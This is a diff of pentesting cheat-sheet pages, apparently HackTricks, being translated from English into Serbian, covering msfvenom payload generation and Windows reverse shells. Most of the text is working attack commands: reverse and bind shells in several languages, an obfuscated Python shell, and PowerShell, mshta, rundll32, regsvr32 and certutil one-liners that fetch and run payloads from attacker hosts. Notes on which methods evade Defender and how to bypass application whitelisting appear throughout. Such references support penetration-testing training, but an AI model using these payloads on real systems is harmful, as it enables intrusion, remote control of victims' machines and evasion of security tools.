 msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
 ```
-
 ### CMD Shell
-
 ```bash
 msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
 ```
-
-### **Execute Command**
-
+### **Izvrši Komandu**
 ```bash
 msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
 msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
 ```
-
 ### Encoder
-
 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
 ```
-
-### Embedded inside executable
-
+### Ugrađen unutar izvršnog fajla
 ```bash
 msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
 ```
-
 ## Linux Payloads
 
 ### Reverse Shell
-
 ```bash
 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
 ```
-
 ### Bind Shell
-
 ```bash
 msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
 ```
-
 ### SunOS (Solaris)
-
 ```bash
 msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
 ```
-
 ## **MAC Payloads**
 
 ### **Reverse Shell:**
-
 ```bash
 msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
 ```
-
 ### **Bind Shell**
-
 ```bash
 msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
 ```
-
 ## **Web Based Payloads**
 
 ### **PHP**
 
 #### Reverse shel**l**
-
 ```bash
 msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
 cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
 ```
-
 ### ASP/x
 
-#### Reverse shell
-
+#### Obrnuta ljuska
 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
 ```
-
 ### JSP
 
-#### Reverse shell
-
+#### Obrnuta ljuska
 ```bash
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
 ```
+### RAT
 
-### WAR
-
-#### Reverse Shell
-
+#### Obrnuta ljuska
 ```bash
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
 ```
-
 ### NodeJS
-
 ```bash
 msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
 ```
-
-## **Script Language payloads**
+## **Script jezik payloads**
 
 ### **Perl**
-
 ```bash
 msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
 ```
-
 ### **Python**
-
 ```bash
 msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
 ```
-
 ### **Bash**
-
 ```bash
 msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
 ```
-
-

-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-hacking/reverse-shells/windows.md b/src/generic-hacking/reverse-shells/windows.md
index 4bf4f6792..3e2b82d5e 100644
--- a/src/generic-hacking/reverse-shells/windows.md
+++ b/src/generic-hacking/reverse-shells/windows.md
@@ -4,37 +4,30 @@
 
 ## Lolbas
 
-The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\
-Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.**
+Stranica [lolbas-project.github.io](https://lolbas-project.github.io/) je za Windows kao što je [https://gtfobins.github.io/](https://gtfobins.github.io/) za linux.\
+Očigledno, **nema SUID fajlova ili sudo privilegija u Windows-u**, ali je korisno znati **kako** neki **binarni fajlovi** mogu biti (zlo)upotrebljeni za izvođenje nekih neočekivanih akcija kao što je **izvršavanje proizvoljnog koda.**
 
 ## NC
-
 ```bash
 nc.exe -e cmd.exe  
 ```
-
 ## NCAT
 
-victim
-
+žrtva
 ```
 ncat.exe    -e "cmd.exe /c (cmd.exe  2>&1)"
 #Encryption to bypass firewall
 ncat.exe   --ssl -e "cmd.exe /c (cmd.exe  2>&1)"
 ```
-
-attacker
-
+napadač
 ```
 ncat -l 
 #Encryption to bypass firewall
 ncat -l  --ssl
 ```
-
 ## SBD
 
-**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for Netcat.
-
+**[sbd](https://www.kali.org/tools/sbd/) je prenosiva i sigurna alternativa za Netcat**. Radi na Unix-sličnim sistemima i Win32. Sa funkcijama kao što su jaka enkripcija, izvršavanje programa, prilagodljivi izvorni portovi i kontinuirana ponovna konekcija, sbd pruža svestrano rešenje za TCP/IP komunikaciju. Za korisnike Windows-a, sbd.exe verzija iz Kali Linux distribucije može se koristiti kao pouzdana zamena za Netcat.
 ```bash
 # Victims machine
 sbd -l -p 4444 -e bash -v -n
@@ -46,46 +39,34 @@ sbd 10.10.10.10 4444
 id
 uid=0(root) gid=0(root) groups=0(root)
 ```
-
 ## Python
-
 ```bash
 #Windows
 C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
 ```
-
 ## Perl
-
 ```bash
 perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
-
-## Ruby
-
+## Руби
 ```bash
 #Windows
 ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
-
 ## Lua
-
 ```bash
 lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
-
 ## OpenSSH
 
-Attacker (Kali)
-
+Napadač (Kali)
 ```bash
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
 openssl s_server -quiet -key key.pem -cert cert.pem -port  #Here you will be able to introduce the commands
 openssl s_server -quiet -key key.pem -cert cert.pem -port  #Here yo will be able to get the response
 ```
-
-Victim
-
+Žrtva
 ```bash
 #Linux
 openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :
@@ -93,38 +74,30 @@ openssl s_client -quiet -connect :|/bin/bash|openssl s_clien
 #Windows
 openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect :
 ```
-
 ## Powershell
-
 ```bash
 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
 powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
 Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
 echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
 ```
-
-Process performing network call: **powershell.exe**\
-Payload written on disk: **NO** (_at least nowhere I could find using procmon !_)
-
+Proces koji izvršava mrežni poziv: **powershell.exe**\
+Payload napisan na disku: **NE** (_barem nigde gde sam mogao da pronađem koristeći procmon !_ )
 ```bash
 powershell -exec bypass -f \\webdavserver\folder\payload.ps1
 ```
+Proces koji izvršava mrežni poziv: **svchost.exe**\
+Payload napisan na disku: **WebDAV klijent lokalna keš memorija**
 
-Process performing network call: **svchost.exe**\
-Payload written on disk: **WebDAV client local cache**
-
-**One liner:**
-
+**Jedna linija:**
 ```bash
 $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
-
-**Get more info about different Powershell Shells at the end of this document**
+**Dobijte više informacija o različitim Powershell Shell-ovima na kraju ovog dokumenta**
 
 ## Mshta
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```bash
 mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
 ```
@@ -136,26 +109,22 @@ mshta http://webserver/payload.hta
 ```bash
 mshta \\webdavserver\folder\payload.hta
 ```
-
-#### **Example of hta-psh reverse shell (use hta to download and execute PS backdoor)**
-
+#### **Primer hta-psh reverzne ljuske (koristite hta za preuzimanje i izvršavanje PS backdoora)**
 ```xml
- 
+
 ```
+**Možete lako preuzeti i izvršiti Koadic zombija koristeći stager hta**
 
-**You can download & execute very easily a Koadic zombie using the stager hta**
-
-#### hta example
-
-[**From here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
+#### hta primer
 
+[**Odavde**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
 ```xml
 
 
 
 
 
 
@@ -163,11 +132,9 @@ mshta \\webdavserver\folder\payload.hta
 
 
 ```
-
 #### **mshta - sct**
 
-[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
-
+[**Odavde**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
 ```xml
 
 
@@ -178,14 +145,12 @@ mshta \\webdavserver\folder\payload.hta
 
 
 
 ```
-
 #### **Mshta - Metasploit**
-
 ```bash
 use exploit/windows/misc/hta_server
 msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
@@ -196,15 +161,13 @@ msf exploit(windows/misc/hta_server) > exploit
 ```bash
 Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
 ```
-
-**Detected by defender**
+**Otkriveno od strane defendera**
 
 ## **Rundll32**
 
-[**Dll hello world example**](https://github.com/carterjones/hello-world-dll)
-
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
+[**Dll hello world primer**](https://github.com/carterjones/hello-world-dll)
 
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```bash
 rundll32 \\webdavserver\folder\payload.dll,entrypoint
 ```
@@ -212,13 +175,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
 ```bash
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
 ```
-
-**Detected by defender**
+**Otkriveno od strane defendera**
 
 **Rundll32 - sct**
 
-[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
-
+[**Odavde**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
 ```xml
 
 
@@ -228,22 +189,18 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http
 
 
 
 ```
-
 #### **Rundll32 - Metasploit**
-
 ```bash
 use windows/smb/smb_delivery
 run
 #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
 ```
-
 **Rundll32 - Koadic**
-
 ```bash
 use stager/js/rundll32_js
 set SRVHOST 192.168.1.107
@@ -252,11 +209,9 @@ run
 #Koadic will tell you what you need to execute inside the victim, it will be something like:
 rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
 ```
-
 ## Regsvr32
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```bash
 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
 ```
@@ -264,32 +219,28 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
 ```
 regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
 ```
-
-**Detected by defender**
+**Otkriveno od strane defendera**
 
 #### Regsvr32 -sct
 
-[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
-
+[**Odavde**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
 ```markup
 
 
 
 
 
-    
 
 
 ```
-
 #### **Regsvr32 - Metasploit**
-
 ```bash
 use multi/script/web_delivery
 set target 3
@@ -298,50 +249,38 @@ set lhost 10.2.0.5
 run
 #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
 ```
-
-**You can download & execute very easily a Koadic zombie using the stager regsvr**
+**Možete lako preuzeti i izvršiti Koadic zombija koristeći stager regsvr**
 
 ## Certutil
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
-Download a B64dll, decode it and execute it.
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 
+Preuzmite B64dll, dekodirajte ga i izvršite.
 ```bash
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
 ```
-
-Download a B64exe, decode it and execute it.
-
+Preuzmite B64exe, dekodirajte ga i izvršite.
 ```bash
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 ```
-
-**Detected by defender**
+**Otkriveno od strane defendera**
 
 ## **Cscript/Wscript**
-
 ```bash
 powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
 ```
-
 **Cscript - Metasploit**
-
 ```bash
 msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
 ```
-
-**Detected by defender**
+**Otkriveno od strane defendera**
 
 ## PS-Bat
-
 ```bash
 \\webdavserver\folder\batchfile.bat
 ```
-
-Process performing network call: **svchost.exe**\
-Payload written on disk: **WebDAV client local cache**
-
+Proces koji izvršava mrežni poziv: **svchost.exe**\
+Payload napisan na disku: **WebDAV klijent lokalna keš memorija**
 ```bash
 msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
 impacket-smbserver -smb2support kali `pwd`
@@ -350,102 +289,83 @@ impacket-smbserver -smb2support kali `pwd`
 ```bash
 \\10.8.0.3\kali\shell.bat
 ```
-
-**Detected by defender**
+**Otkriveno od strane defendera**
 
 ## **MSIExec**
 
-Attacker
-
+Napadač
 ```
 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
 python -m SimpleHTTPServer 80
 ```
-
-Victim:
-
+Žrtva:
 ```
 victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
 ```
-
-**Detected**
+**Otkriveno**
 
 ## **Wmic**
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```bash
 wmic os get /format:"https://webserver/payload.xsl"
 ```
-
-Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
-
+Primer xsl fajla [odavde](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
 ```xml
 
 
 
-    
-        
-    
+
+
+
 
 ```
+**Nije otkriveno**
 
-**Not detected**
-
-**You can download & execute very easily a Koadic zombie using the stager wmic**
+**Možete lako preuzeti i izvršiti Koadic zombija koristeći stager wmic**
 
 ## Msbuild
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```
 cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
 ```
-
-You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.\
-Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
-
+Možete koristiti ovu tehniku da zaobiđete Application Whitelisting i Powershell.exe ograničenja. Bićete upitani sa PS shell-om.\
+Jednostavno preuzmite ovo i izvršite: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
 ```
-
-**Not detected**
+**Nije otkriveno**
 
 ## **CSC**
 
-Compile C# code in the victim machine.
-
+Kompajlirajte C# kod na žrtvenoj mašini.
 ```
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
 ```
+Možete preuzeti osnovni C# reverse shell odavde: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
 
-You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
-
-**Not deteted**
+**Nije otkriveno**
 
 ## **Regasm/Regsvc**
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
 ```
-
-**I haven't tried it**
+**Nisam to probao**
 
 [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
 
 ## Odbcconf
 
-- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
-
+- [Odavde](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
 ```bash
 odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 ```
-
-**I haven't tried it**
+**Nisam to probao**
 
 [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
 
@@ -455,98 +375,82 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 
 [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
 
-In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script and append to the end of the file:
-
+U **Shells** folderu, postoji mnogo različitih shellova. Da biste preuzeli i izvršili Invoke-_PowerShellTcp.ps1_, napravite kopiju skripte i dodajte na kraj datoteke:
 ```
 Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
 ```
-
-Start serving the script in a web server and execute it on the victim's end:
-
+Pokrenite skriptu na veb serveru i izvršite je na strani žrtve:
 ```
 powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
 ```
+Defender još uvek ne prepoznaje kao zlonamerni kod (do sada, 3/04/2019).
 
-Defender doesn't detect it as malicious code (yet, 3/04/2019).
-
-**TODO: Check other nishang shells**
+**TODO: Proveriti druge nishang shell-ove**
 
 ### **PS-Powercat**
 
 [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
 
-Download, start a web server, start the listener, and execute it on the victim's end:
-
+Preuzmite, pokrenite veb server, pokrenite slušalac i izvršite ga na strani žrtve:
 ```
- powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
+powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
 ```
+Defender ga ne prepoznaje kao zlonamerni kod (još, 3/04/2019).
 
-Defender doesn't detect it as malicious code (yet, 3/04/2019).
-
-**Other options offered by powercat:**
+**Druge opcije koje nudi powercat:**
 
 Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
-
 ```
 Serve a cmd Shell:
-    powercat -l -p 443 -e cmd
+powercat -l -p 443 -e cmd
 Send a cmd Shell:
-    powercat -c 10.1.1.1 -p 443 -e cmd
+powercat -c 10.1.1.1 -p 443 -e cmd
 Send a powershell:
-    powercat -c 10.1.1.1 -p 443 -ep
+powercat -c 10.1.1.1 -p 443 -ep
 Send a powershell UDP:
-    powercat -c 10.1.1.1 -p 443 -ep -u
+powercat -c 10.1.1.1 -p 443 -ep -u
 TCP Listener to TCP Client Relay:
-    powercat -l -p 8000 -r tcp:10.1.1.16:443
+powercat -l -p 8000 -r tcp:10.1.1.16:443
 Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
-    powercat -c 10.1.1.15 -p 443 -e cmd -g
+powercat -c 10.1.1.15 -p 443 -e cmd -g
 Start A Persistent Server That Serves a File:
-    powercat -l -p 443 -i C:\inputfile -rep
+powercat -l -p 443 -i C:\inputfile -rep
 ```
-
 ### Empire
 
 [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
 
-Create a powershell launcher, save it in a file and download and execute it.
-
+Kreirajte powershell launcher, sačuvajte ga u datoteku i preuzmite i izvršite ga.
 ```
 powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
 ```
-
-**Detected as malicious code**
+**Otkriveno kao zlonamerni kod**
 
 ### MSF-Unicorn
 
 [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
 
-Create a powershell version of metasploit backdoor using unicorn
-
+Kreirajte powershell verziju metasploit backdoora koristeći unicorn
 ```
 python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
 ```
-
-Start msfconsole with the created resource:
-
+Pokrenite msfconsole sa kreiranim resursom:
 ```
 msfconsole -r unicorn.rc
 ```
-
-Start a web server serving the _powershell_attack.txt_ file and execute in the victim:
-
+Pokrenite web server koji servira _powershell_attack.txt_ datoteku i izvršite na žrtvi:
 ```
 powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
 ```
+**Otkriveno kao zlonamerni kod**
 
-**Detected as malicious code**
+## Više
 
-## More
-
-[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded (cyphered)\
+[PS>Attack](https://github.com/jaredhaight/PSAttack) PS konzola sa nekim ofanzivnim PS modulima unapred učitanim (šifrovano)\
 [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
-WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX)
+WinPWN](https://github.com/SecureThisShit/WinPwn) PS konzola sa nekim ofanzivnim PS modulima i detekcijom proksija (IEX)
 
-## References
+## Reference
 
 - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
 - [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
diff --git a/src/generic-hacking/search-exploits.md b/src/generic-hacking/search-exploits.md
index 8d195840a..5ac2bfb84 100644
--- a/src/generic-hacking/search-exploits.md
+++ b/src/generic-hacking/search-exploits.md
@@ -1,25 +1,16 @@
-# Search Exploits
+# Pretraži Eksploite
 
 {{#include ../banners/hacktricks-training.md}}
 
-

+### Pregledač
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Uvek pretražujte u "google" ili drugim: **\ \[version] exploit**
 
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %}
-
-### Browser
-
-Always search in "google" or others: **\ \[version] exploit**
-
-You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io).
+Takođe biste trebali probati **shodan** **pretragu eksploita** sa [https://exploits.shodan.io/](https://exploits.shodan.io).
 
 ### Searchsploit
 
-Useful to search exploits for services in **exploitdb from the console.**
-
+Koristan za pretragu eksploita za usluge u **exploitdb iz konzole.**
 ```bash
 #Searchsploit tricks
 searchsploit "linux Kernel" #Example
@@ -29,43 +20,33 @@ searchsploit -p 7618[.c] #Show complete path
